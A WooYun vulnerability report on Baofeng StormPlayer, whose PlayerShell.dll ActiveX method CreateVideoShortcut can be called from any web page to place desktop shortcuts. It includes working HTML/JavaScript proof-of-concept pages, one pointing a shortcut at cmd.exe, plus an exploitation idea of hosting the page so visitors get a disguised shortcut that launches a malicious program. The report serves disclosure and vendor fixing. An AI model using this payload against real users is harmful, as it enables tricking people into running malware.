当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046402

漏洞标题:暴风影音调用自身接口创建任意桌面快捷方式漏洞

相关厂商:暴风影音

漏洞作者: 摸了你

提交时间:2013-12-19 11:11

修复时间:2014-03-19 11:12

公开时间:2014-03-19 11:12

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-19: 厂商已经确认,细节仅向厂商公开
2013-12-22: 细节向第三方安全合作伙伴开放
2014-02-12: 细节向核心白帽子及相关领域专家公开
2014-02-22: 细节向普通白帽子公开
2014-03-04: 细节向实习白帽子公开
2014-03-19: 细节向公众公开

简要描述:

类似0day里头的activex文件权限漏洞例子,属于可调用自身接口没做安全校验的漏洞。

详细说明:

1、这段时间fuzz 播放器activex,发现baofeng有个有意思的漏洞,今天又下载最新版本测试了下,依然有效
2、用Comraider,fuzz 暴风影音安装目录
有相关异常,但着实没有找到有用信息,准备然后切换到桌面的时候,发下桌面多了几个这样的文件

QQ图片20131219002232.jpg


然后我看了下Comraider里头相关activex,及相关函数接口,发现
C:\Program Files\Baofeng\StormPlayer\webplayer\PlayerShell.dll 这个activex里头的

Function CreateVideoShortcut (
 	ByVal title  As String , 
 	ByVal video_url  As String , 
 	ByVal img_url  As String 
)  As Boolean


比较可疑,删掉产生的上图3文件,fuzz这个函数,再看看桌面,这3个文件又生成了。
那么我们写个测试页面看看

<html>
<body>
<object classid='clsid:F587310D-5306-494D-87E2-88334B46E781' id="target"></object> 
<script>
title="test";
video_url="test";
img_url="test";
target.CreateVideoShortcut(title, video_url, img_url);
</script>
</body>
</html>


用ie 8打开,桌面多了这么一快捷方式

QQ图片20131219004754.jpg


2、那么分析下这个函数,和ie显示的东西
猜测这个可能是打开远程包含vedio地址的url,但没有做安全限制,导致它人可调用此接口
修改参数分别进行测试。
将参数video_url修改成"c:\\windows\\system32\\cmd.exe",发现桌面生成此快捷方式

testsss.jpg


双击可运行cmd.exe

test2.jpg


3、利用思路
写个poc挂到网上,他人访问,可在桌面生成暴风图标的快捷方式,点击后执行恶意程序。

漏洞证明:

<html>
<body>
<object classid='clsid:F587310D-5306-494D-87E2-88334B46E781' id="target"></object> 
<script>
title="test";
video_url="c:\\windows\\system32\\cmd.exe";
img_url="test";
target.CreateVideoShortcut(title, video_url, img_url);
</script>
</body>
</html>


</code>

修复方案:

接口权限~~~

版权声明:转载请注明来源 摸了你@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-12-19 15:06

厂商回复:

感谢您发现并通知漏洞,我们会尽快处理

最新状态:

暂无

漏洞评价:

评论

  1. 2013-12-19 11:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我草

  2. 2013-12-19 11:37 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

    我操,评论里你也转义,没法表达清楚了,算球,忙了...大概就是预览会转义斜杠

  3. 2013-12-19 11:43 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @xsser 管理账号请注意言辞!!!@疯狗 你说是不是!

  4. 2013-12-19 11:50 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @摸了你 ok

  5. 2013-12-19 11:59 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @摸了你 呃,转义。。另外细节问题啥的可以私信说,尽量别放在评论中哈。

  6. 2013-12-19 12:32 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

    @疯狗 呃,知道了...